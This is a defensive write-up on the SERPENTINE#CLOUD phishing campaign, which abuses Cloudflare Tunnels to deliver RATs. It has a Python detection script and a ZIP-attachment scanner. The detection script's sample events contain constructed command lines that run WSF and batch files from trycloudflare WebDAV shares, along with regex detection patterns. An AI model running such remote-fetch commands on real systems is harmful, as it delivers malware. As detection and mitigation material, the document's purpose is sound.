SERPENTINE#CLOUD: Sophisticated Malware Campaign Abusing Cloudflare Tunnels
Overview
A new malware operation, dubbed SERPENTINE#CLOUD, is actively exploiting Cloudflare Tunnel subdomains to distribute Remote Access Trojans (RATs) through phishing campaigns. By using trusted infrastructure and fileless techniques, attackers are making it harder for security systems to detect the threat.
Attack Chain Breakdown
- Phishing Email Delivery: Victims receive emails disguised as invoice or payment notifications. These contain links to ZIP files hosted on attacker-controlled servers.
- Malicious LNK Shortcut: Inside the ZIP is a .lnk (shortcut) file pretending to be a document. When clicked, it launches a command script.
- Cloudflare Tunnel-Based Payload Hosting: The script connects to a Cloudflare Tunnel subdomain (*.trycloudflare.com) over WebDAV to download a Windows Script File (WSF), avoiding static URL detection.
- Fileless Execution: The WSF invokes a Python-based loader that executes shellcode in memory using Donut (an open-source loader). The final payload is typically AsyncRAT or Remcos, both powerful remote access tools.
- Living-off-the-Land (LOTL) Techniques: Attackers use built-in Windows tools such as cscript.exe, combined with script obfuscation and in-memory execution, to evade antivirus software.
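The chain above leaves a recognisable footprint in process-creation telemetry: a Windows script host launched with a WebDAV UNC path whose host is a *.trycloudflare.com subdomain, followed by a Python interpreter whose parent is that script host. The following is an added example written for this summary, not code from the original report or from any vendor product. It assumes Sysmon-style process-creation records flattened to one line with Image, CommandLine and ParentImage fields; the five sample events, including the hostnames and file names, are constructed for the example.

```python
import re

# Constructed sample events (not real telemetry). The Image / CommandLine /
# ParentImage fields mirror Sysmon process-creation records, flattened to one
# key="value" line each; hostnames and file names are invented.
SAMPLE_EVENTS = [
    'Image="C:\\Windows\\System32\\cscript.exe" CommandLine="cscript.exe //B \\\\abc-def.trycloudflare.com@SSL\\DavWWWRoot\\invoice.wsf" ParentImage="C:\\Windows\\System32\\cmd.exe"',
    'Image="C:\\Windows\\System32\\cmd.exe" CommandLine="cmd.exe /c start \\\\xyz.trycloudflare.com@SSL\\share\\update.bat" ParentImage="C:\\Windows\\explorer.exe"',
    'Image="C:\\Python312\\python.exe" CommandLine="python.exe loader.py" ParentImage="C:\\Windows\\System32\\wscript.exe"',
    'Image="C:\\Windows\\System32\\cscript.exe" CommandLine="cscript.exe C:\\Scripts\\backup.vbs" ParentImage="C:\\Windows\\System32\\svchost.exe"',
    'Image="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" CommandLine="WINWORD.EXE /n" ParentImage="C:\\Windows\\explorer.exe"',
]

# key="value" pairs; values are assumed to contain no double quotes.
KV_RE = re.compile(r'(\w+)="([^"]*)"')
# UNC path whose host is a *.trycloudflare.com tunnel, with or without the
# @SSL / @port suffixes the WebDAV mini-redirector accepts.
TUNNEL_UNC_RE = re.compile(
    r'\\\\([A-Za-z0-9-]+\.trycloudflare\.com)(?:@SSL)?(?:@\d+)?\\', re.I
)
# Markers that a UNC path is being served over WebDAV rather than SMB.
WEBDAV_RE = re.compile(r'@SSL\\|DavWWWRoot', re.I)
# Script hosts named in the report; extend the set for your own environment.
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}


def parse_event(line: str) -> dict:
    """Turn one flattened key="value" record into a dict."""
    return {key: value for key, value in KV_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (last backslash component)."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the names of every rule the event trips, in fixed order."""
    hits = []
    cmd = event.get("CommandLine", "")
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))

    # Rule 1: any process referencing a tunnel subdomain as a UNC share.
    if TUNNEL_UNC_RE.search(cmd):
        hits.append("tunnel_unc_path")
    # Rule 2: a script host told to run something from a WebDAV share.
    if image in SCRIPT_HOSTS and WEBDAV_RE.search(cmd):
        hits.append("script_host_from_webdav")
    # Rule 3: Python started by a script host, the loader stage of the chain.
    if image == "python.exe" and parent in SCRIPT_HOSTS:
        hits.append("python_spawned_by_script_host")
    return hits


def scan(lines) -> list:
    """Return (event_index, [rule, ...]) for every event that matched."""
    findings = []
    for index, line in enumerate(lines):
        hits = evaluate(parse_event(line))
        if hits:
            findings.append((index, hits))
    return findings


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)}")
```

Rule 1 alone will fire on benign administrative use of Cloudflare Tunnel, so in practice it is the combination (a script host plus WebDAV plus a tunnel host, or a Python child of cscript.exe/wscript.exe) that should page an analyst; the scan here returns all rule names per event so a downstream scoring step can weight them.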
Campaign Scope and Background
- Target Regions: United States, UK, Germany, other parts of Europe and Asia.
- Attribution: Unconfirmed. The presence of English-language comments in the scripts suggests fluent operators, but no firm link to nation-state actors has been made.
- Context: This campaign builds on a trend seen since 2024, where attackers exploit Cloudflare Tunnel to host malware like GuLoader, Xworm, AsyncRAT, VenomRAT, and Remcos.
Why Cloudflare Tunnel Is Being Exploited
- Legitimacy: Cloudflare domains often bypass URL filters due to their reputation.
- Encrypted & Disposable: These tunnels use encrypted connections and allow attackers to set up short-lived infrastructure that’s hard to trace.
- Detection Gaps: Many organizations allow Cloudflare domains and may not inspect encrypted traffic closely enough.
Detection and Mitigation Recommendations
- Email Security: Implement advanced email filtering and block ZIP attachments containing .lnk or .wsf files.
- Domain Control: Restrict or block access to trycloudflare.com and other dynamic tunnel domains not essential for business.
- Script Execution Policies: Limit or disable usage of scripting engines like cscript.exe and Python where possible.
- Endpoint Detection and Response (EDR): Use tools capable of identifying in-memory execution and shellcode injection.
- Network Analysis: Monitor for abnormal WebDAV connections or traffic to newly created subdomains.
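The first recommendation, blocking ZIP attachments that carry .lnk or .wsf files, is simple to state but has two edge cases a gateway must handle: double extensions such as Invoice.pdf.lnk, and a ZIP nested inside the ZIP. The example below is added here to illustrate that check and is not from the original report or any mail-security product. It builds its own sample archives in memory (the file names and contents are constructed) and fails closed on an attachment that cannot be parsed at all.

```python
import io
import zipfile
from pathlib import PureWindowsPath

# Extensions the report recommends blocking inside ZIP attachments.
BLOCKED_EXTENSIONS = {".lnk", ".wsf"}
# Refuse to expand nested archives larger than this (assumed limit) so a
# crafted archive cannot exhaust memory during inspection.
MAX_NESTED_BYTES = 5_000_000


def risky_members(data: bytes, blocked=BLOCKED_EXTENSIONS, max_depth: int = 2, _prefix: str = "") -> list:
    """List member paths whose extension is blocked, descending into nested ZIPs.

    Nested members are reported as "outer.zip!inner/path". Raises
    zipfile.BadZipFile if the top-level data is not a ZIP archive.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            full_name = f"{_prefix}{info.filename}"
            # PureWindowsPath.suffix gives the final extension, so
            # "Invoice.pdf.lnk" is seen as ".lnk" rather than ".pdf".
            ext = PureWindowsPath(info.filename).suffix.lower()
            if ext in blocked:
                found.append(full_name)
            elif ext == ".zip" and max_depth > 0:
                if info.file_size > MAX_NESTED_BYTES:
                    found.append(full_name + " (nested zip too large to inspect)")
                    continue
                try:
                    inner = zf.read(info)
                    found.extend(risky_members(inner, blocked, max_depth - 1, full_name + "!"))
                except (zipfile.BadZipFile, RuntimeError):
                    # Corrupt or password-protected inner archive: cannot be
                    # verified, so treat it as risky.
                    found.append(full_name + " (unreadable nested zip)")
    return found


def should_quarantine(data: bytes) -> bool:
    """Gateway decision: quarantine on any blocked member or an unparseable archive."""
    try:
        return bool(risky_members(data))
    except zipfile.BadZipFile:
        return True


def build_zip(members: dict) -> bytes:
    """Build an in-memory ZIP from {member_name: content_bytes} (test fixture helper)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buffer.getvalue()


# Constructed sample attachments; the shortcut and script bodies are placeholders.
SAMPLE_MALICIOUS = build_zip({"Invoice_4471.pdf.lnk": b"placeholder-lnk", "readme.txt": b"see invoice"})
SAMPLE_NESTED = build_zip({"payment.zip": build_zip({"docs/Payment_Notice.wsf": b"<job/>"})})
SAMPLE_BENIGN = build_zip({"report.docx": b"placeholder-docx", "notes.txt": b"ok"})

if __name__ == "__main__":
    for label, sample in [("malicious", SAMPLE_MALICIOUS), ("nested", SAMPLE_NESTED), ("benign", SAMPLE_BENIGN)]:
        print(f"{label}: quarantine={should_quarantine(sample)} members={risky_members(sample)}")
```

The depth limit and size cap are there because an attacker controls the archive: an inspector that recurses without bounds is itself a denial-of-service target, and an encrypted inner ZIP that cannot be opened should be treated as unverified rather than clean.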
Final Thoughts
The SERPENTINE#CLOUD campaign demonstrates how threat actors continue to evolve, blending legitimate tools with evasive tactics. As more attackers move away from traditional command-and-control infrastructures in favor of tunneling services, defenders must adapt with stronger detection at the network and behavioral level.